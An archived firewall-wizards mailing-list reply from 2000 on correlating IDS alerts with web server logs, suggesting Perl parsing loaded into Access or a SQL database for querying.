You can parse the logs in perl and then populate either MS Access or a SQL like database (mySQL,Sybase...) and run SQL queries. Suprisingly, you can go quite a long way with Access, it supports a database size of 2Gb. Using VB in Access you can automate a lot in terms of populating the database and running the queries. Ashish Desai Fidelity Investments > -----Original Message----- > From: Pete Storm [SMTP:petestormat_private] > Sent: Tuesday, January 11, 2000 3:18 PM > To: firewall-wizardsat_private > Subject: Tools to correlate attacks b/w diff. logs > > Hi all, > > Does anyone know of a tool out there that will allow > me to correlate incidents between several different > logs? For example, if I see an attempt to pull off a > php exploit on my IDS it stands to reason that I'll > see a similar log entry on my web server. What I'm > looking for is something that will pull these two > records out of the individual logs and place them in > an "incident" log as a related event. > > The current problem is that we're talking about > hundreds of thousands of log entries. Suppose I could > Perl it, but I was kinda hoping there might be a > commercial/shareware tool out there already that could > do it so much better than I could. > > thanks, > phs > __________________________________________________ > Do You Yahoo!? > Talk to your friends online with Yahoo! Messenger. > http://im.yahoo.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:57:16 PDT